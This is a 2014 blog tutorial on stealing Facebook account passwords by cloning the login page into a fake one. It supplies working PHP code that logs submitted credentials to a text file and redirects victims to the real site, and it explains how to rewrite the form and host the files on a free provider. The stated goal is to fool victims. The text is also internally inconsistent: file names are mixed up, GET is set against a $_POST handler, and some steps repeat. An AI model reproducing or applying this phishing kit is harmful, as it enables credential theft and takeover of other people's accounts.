Saturday, April 05, 2014
HOW TO HACK FACEBOOK ACCOUNTS WITH PHISHING [UPDATED]
Saturday, April 05, 2014 by Unknown
HOW TO HACK FACEBOOK ACCOUNTS WITH PHISHING [UPDATED]
Hello Friends , This is my third post on Phishing. In the Last two posts I told yo about "how to hack Gmail and Facebook accounts with phishing".
Today Also I'll Tell you about Facebook account hacking with Phishing. This is a Updated Hacking Trick for My Last Two Phishing Posts.
Note:- The PHP file which was not working , now has been replaced with a updated one.
So Viewers Lets Begin.....
Here
I will show you how you can create fake facebook log-in page and then fool your
victim to put his username and password in it so that you can get his account password.
THINGS YOU WILL NEED:-
You
need 3 files
- Index.html
- phish.php
- passwords.txt
STEPS
- To create index.html :
- First of all open http://www.facebook.com/ in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu.
- Once done you will have a file named “index.html” and a folder named “index_files”.
- Folder will have several files in it, let them as it is and open index.html in notepad or word-pad.
- From edit menu select find, type action in it and locate following string
action="https://www.facebook.com/login.php?login_attempt=1"
5. Now replace this string with action= “pass.php” and also change the
method in html from 'post' to 'get'.
6. Save the document.
- To create phish.php :
- Open notepad type or copy the following php code in it.
<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
NOW SAVE THE FILE AS " pass.php "
Simply create text document and rename it as passwords.txt
UPLOADING THE FILES
Now you'll need a free web hosting service that supports PHP.
I suggest you to use http://www.1freehosting.com/ or cpanel.1freehosting.com
- To create passwords.txt :
Simply create text document and rename it as passwords.txt
UPLOADING THE FILES
Now you'll need a free web hosting service that supports PHP.
I suggest you to use http://www.1freehosting.com/ or cpanel.1freehosting.com
- Open the site and create an account. Once you have created your account, you login to your account
- Now Go to Hosting Tab and Create a Domain of your Phishing page there .
- When your account get active ,Click on Switch Button
- Now Scroll Down and You will find File Manager , Click on It
Now your File Manager Will Get Installed and will be opened , Now Uploading all the Three Files there and Close the File manager.
THATS IT .... CONGRATULATIONS YOU HAVE JUST NOW CREATED A PHISHING PAGE
Subscribe to:
Post Comments (Atom)

0 Responses to “HOW TO HACK FACEBOOK ACCOUNTS WITH PHISHING [UPDATED]”
Post a Comment